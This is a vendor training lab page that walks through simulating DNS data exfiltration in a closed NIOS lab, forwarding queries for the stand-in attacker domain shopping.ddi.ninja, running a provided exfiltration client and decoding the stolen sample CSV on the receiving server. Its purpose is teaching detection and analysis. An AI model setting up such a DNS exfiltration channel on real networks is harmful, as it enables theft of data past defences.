Skip to main content
Skip table of contents

Exfiltrating Data over DNS (2561)

This lab requires a lab environment with Threat Insight capability!
Please ensure that you have deployed a NIOS 9.0 Lab Environment (with Threat Insight) lab environment.

Scenario

You are performing data exfiltration as part of a security assessment exercise. Your security team has developed an internal data exfiltration tool that includes a client and a server, utilizing the test domain shopping.ddi.ninja. Please configure the DNS server to foward queries for this test domain to the authoritative server that’s been configured to receive data, start the test client to exfiltrate data over DNS, and capture the entire transaction to included in your security assessment report.

Estimate Completion Time

  • 20 to 30 Minutes

Prerequisites

  • You must deploy the NIOS 9.0 lab environment.

Learning Content

Lab Initiation

Access jump-desktop

Once the lab is deployed, you can access the virtual machines required to complete this lab activity. To initiate the lab, click on the jump-desktop tile and login to the Linux UI:

Username: training

Password: infoblox

Initiate lab

To initiate the lab, double-click the Launch Lab icon on the Desktop.

Launch Lab

Launch Lab

Choose the lab number from the list and click OK.

After clicking OK, you will see a pop-up message with a brief description of the lab task. If the description looks correct, click Yes to continue lab initiation.

Lab initiation will take a couple of minutes to finish.

Once complete, you will see another pop-up message with the login credentials and the URL for the Grid Manager’s User Interface. Note that the credentials may differ from those from prior labs.

Screenshot 2024-05-06 at 3.16.57 PM.png

Tasks

  1. Configure a DNS forward zone on the Grid for data exfiltration.

  2. Start traffic capture before data exfiltration.

  3. Perform data exfiltration in the lab environment with the provided tools.

  4. Analyze traffic capture results.

 

Task 1: Configure a DNS Forward Zone on the Grid for Data Exfiltration

Create a forward zone towards shopping.ddi.ninja; the domain we will use to simulate the bad actor. Use the following settings:

  • Name: shopping.ddi.ninja

  • Forward to Name Server: support-server.ad.techblue.net

  • Name Server Address: 10.100.0.20

  • Enable Option: Use Forwarders Only

  • Member: ibns2.techblue.net

Task 2: Start Traffic Capture to Catch the Exfiltration Queries

  • Start traffic capturing on the member ibns2.techblue.net.

Task 3: Start a DNS Data Exfiltration Attack

  • On jump-desktop, open two terminal windows:

    • The first will be used to remotely log in to support-server using the command ssh training@10.100.0.20 and enter the command realtime-decode to decode and present the exfiltrated data as they are received in real-time.

    • The second will be used to start exfiltrating data from the victim (jump-desktop) towards the bad actor (shopping.ddi.ninja) using the command analytics-test 10.200.0.105.

Task 4: Observe and Analyze Data Capture Results

You may enter this filter into Wireshark to display only DNS traffic related to the IP address 10.200.0.105 (ibns2) for the domain shopping.ddi.ninja:

dns and ip.addr == 10.200.0.105 and dns.qry.name contains shopping.ddi.ninja

  • Observe the exfiltrated data obtained by the bad actor support-server.

  • Stop the traffic capture, download the captured file from ibns2.techblue.net, open the capture file with Wireshark, and analyze the results.

This lab only provides instructions to exfiltrate data over DNS. To see how it can be detected and stopped, refer to the instructions in Lab 2565.

Solutions

Task 1 Solution: Configure a DNS Forward Zone on the Grid for Data Exfiltration

  1. On the jump-desktop machine, open a browser window and surf https://10.100.0.100.

  2. Click Data Management → DNS → Zones.

  3. Click the plus (+) icon.

  4. Select Forward Zone from the drop-down menu.

    image-20250207-143535.png

  5. Select Add a forward forward-mapping zone and click Next.

  6. Enter shopping.ddi.ninja as the zone's name and click Next.

    image-20250930-134541.png

  7. Click the Plus(+) icon.

  8. Add the name server support-server.ad.techblue.net with the IP address 10.100.0.20.

  9. Check the Use Forwarders Only checkbox and click Next.

    image-20250930-134601.png

  10. Select Use this set of name servers

  11. Select ibns2.techblue.net from the list.

    image-20250207-144738.png

  12. Click Save & Close.

  13. Restart services when prompted.

  14. Open a terminal window

  15. Use the command dig @10.200.0.105 xyz.shopping.ddi.ninja. A to verify the DNS forward zone was configured correctly.

    • The example below shows querying ibns2.techblue.net (10.200.0.105) for the A record of xyz.shopping.ddi.ninja and getting a NOERROR response.

      image-20250930-134519.png

Task 2 Solution: Start Traffic Capture before Data Exfiltration

  1. Navigate to Grid → Grid Manager.

  2. From the Toolbar, click Traffic Capture.

  3. Click the Plus (+) icon to add ibns2.techblue.net in the Members section.

  4. Click the Start icon in the Capture Control section to begin data capture.

    image-20250207-150931.png

Task 3 Solution: Start a DNS Data Exfiltration Attack

  1. Examine the content of the data that we will exfiltrate by using the command: more /mnt/shared/Dex/Short-Analytics-Test-File.csv.

    2561-03-01.png

  2. Open a terminal window and log in to the support server using the command ssh training@10.100.0.20 and the password infoblox.

  3. Enter the command realtime-decode.

    2561-02-03.png

  4. Open a second terminal window and issue the data exfiltration command: analytics-test 10.200.0.105.

    • This exfiltrates the sample CSV file by querying the DNS server 10.200.0.105 (ibns2).

      image-20250930-140228.png

Task 4 Solution: Observe and Analyze Data Capture Results

  1. Observe the terminal window running the exfiltration attack.

    • We should see the received response message, which means that our bad actor “support-server” was able to receive the queries from our victims.

      image-20250930-140354.png

  2. Observe the terminal window logged in to the support-server, check the output of the realtime-decode command.

    • We should be able to see decoded exfiltrated entries matching the data from the sample file we opened earlier.

      2561-03-03.png

  3. On the Grid, click the stop icon to stop the traffic capture.

    image-20250207-153127.png

  4. Select the checkbox next to ibns2.techblue.net under Members.

  5. Click the Download button and save the file.

    image-20250207-153238.png

  6. Open the capture file with Wireshark and analyze the results.

  7. Use the following Wireshark filter: dns and ip.addr == 10.200.0.105 and dns.qry.name contains shopping.ddi.ninja

    • Note the following IP addresses:

      • 10.35.22.10: The DNS client, jump-desktop.

      • 10.200.0.105: The recursive DNS server, ibns2.techblue.net

      • 10.100.0.20: The (malicious) authoritative DNS server for shopping.ddi.ninja

image-20250930-141152.png

JavaScript errors detected

Please note, these errors can depend on your browser setup.

If this problem persists, please contact our support.

Contact Support Close